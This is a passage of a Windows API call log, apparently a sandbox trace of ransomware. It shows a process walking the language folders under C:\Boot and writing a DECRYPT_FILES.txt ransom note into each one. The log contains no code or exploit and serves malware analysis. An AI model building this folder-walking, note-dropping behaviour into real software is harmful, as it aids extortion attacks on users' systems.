nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0052.382] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0052.382] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0052.382] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0052.382] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0052.382] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0052.382] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0052.382] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0052.382] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0052.382] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16db40) returned 1 [0052.382] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16db00) returned 1 [0052.382] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0052.382] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ", lpFilePart=0x0) returned 0xd [0052.383] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ\\", lpFilePart=0x0) returned 0xe [0052.383] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddfd0 [0052.426] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.426] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0052.426] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0052.426] FindClose (in: hFindFile=0x1a5ddfd0 | out: hFindFile=0x1a5ddfd0) returned 1 [0052.426] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0052.426] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0052.427] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0052.427] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ", lpFilePart=0x0) returned 0xd [0052.427] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ\\", lpFilePart=0x0) returned 0xe [0052.427] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddfd0 [0052.427] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.427] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0052.427] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0052.427] FindClose (in: hFindFile=0x1a5ddfd0 | out: hFindFile=0x1a5ddfd0) returned 1 [0052.427] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0052.427] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0052.428] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x1f [0052.428] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d260) returned 1 [0052.428] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\DECRYPT_FILES.txt" (normalized: "c:\\boot\\cs-cz\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3dc [0052.428] GetFileType (hFile=0x3dc) returned 0x1 [0052.428] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d1d0) returned 1 [0052.428] GetFileType (hFile=0x3dc) returned 0x1 [0052.429] WriteFile (in: hFile=0x3dc, lpBuffer=0x21619c8*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x16d2a8, lpOverlapped=0x0 | out: lpBuffer=0x21619c8*, lpNumberOfBytesWritten=0x16d2a8*=0x9d5, lpOverlapped=0x0) returned 1 [0052.429] CloseHandle (hObject=0x3dc) returned 1 [0052.430] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0052.430] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK", lpFilePart=0x0) returned 0xd [0052.430] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK\\", lpFilePart=0x0) returned 0xe [0052.430] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddfd0 [0052.430] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.430] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0052.430] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0052.430] FindClose (in: hFindFile=0x1a5ddfd0 | out: hFindFile=0x1a5ddfd0) returned 1 [0052.430] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0052.430] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0052.431] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0052.431] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK", lpFilePart=0x0) returned 0xd [0052.431] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK\\", lpFilePart=0x0) returned 0xe [0052.431] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddfd0 [0052.434] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.434] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0052.435] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0052.435] FindClose (in: hFindFile=0x1a5ddfd0 | out: hFindFile=0x1a5ddfd0) returned 1 [0052.435] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0052.435] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0052.435] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x1f [0052.435] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d260) returned 1 [0052.435] CreateFileW (lpFileName="C:\\Boot\\da-DK\\DECRYPT_FILES.txt" (normalized: "c:\\boot\\da-dk\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3dc [0052.435] GetFileType (hFile=0x3dc) returned 0x1 [0052.435] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d1d0) returned 1 [0052.435] GetFileType (hFile=0x3dc) returned 0x1 [0052.436] WriteFile (in: hFile=0x3dc, lpBuffer=0x21653f0*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x16d2a8, lpOverlapped=0x0 | out: lpBuffer=0x21653f0*, lpNumberOfBytesWritten=0x16d2a8*=0x9d5, lpOverlapped=0x0) returned 1 [0052.436] CloseHandle (hObject=0x3dc) returned 1 [0052.437] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0052.437] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE", lpFilePart=0x0) returned 0xd [0052.437] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE\\", lpFilePart=0x0) returned 0xe [0052.437] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddfd0 [0052.441] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.441] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0052.441] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0052.441] FindClose (in: hFindFile=0x1a5ddfd0 | out: hFindFile=0x1a5ddfd0) returned 1 [0052.444] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0052.444] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0052.444] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0052.444] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE", lpFilePart=0x0) returned 0xd [0052.444] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE\\", lpFilePart=0x0) returned 0xe [0052.444] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddfd0 [0052.444] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.444] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0052.444] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0052.445] FindClose (in: hFindFile=0x1a5ddfd0 | out: hFindFile=0x1a5ddfd0) returned 1 [0052.445] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0052.445] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0052.445] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x1f [0052.445] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d260) returned 1 [0052.445] CreateFileW (lpFileName="C:\\Boot\\de-DE\\DECRYPT_FILES.txt" (normalized: "c:\\boot\\de-de\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3e4 [0052.445] GetFileType (hFile=0x3e4) returned 0x1 [0052.445] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d1d0) returned 1 [0052.445] GetFileType (hFile=0x3e4) returned 0x1 [0052.445] WriteFile (in: hFile=0x3e4, lpBuffer=0x2168e18*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x16d2a8, lpOverlapped=0x0 | out: lpBuffer=0x2168e18*, lpNumberOfBytesWritten=0x16d2a8*=0x9d5, lpOverlapped=0x0) returned 1 [0052.446] CloseHandle (hObject=0x3e4) returned 1 [0052.446] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0052.447] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR", lpFilePart=0x0) returned 0xd [0052.447] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR\\", lpFilePart=0x0) returned 0xe [0052.447] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x16cf90 | out: 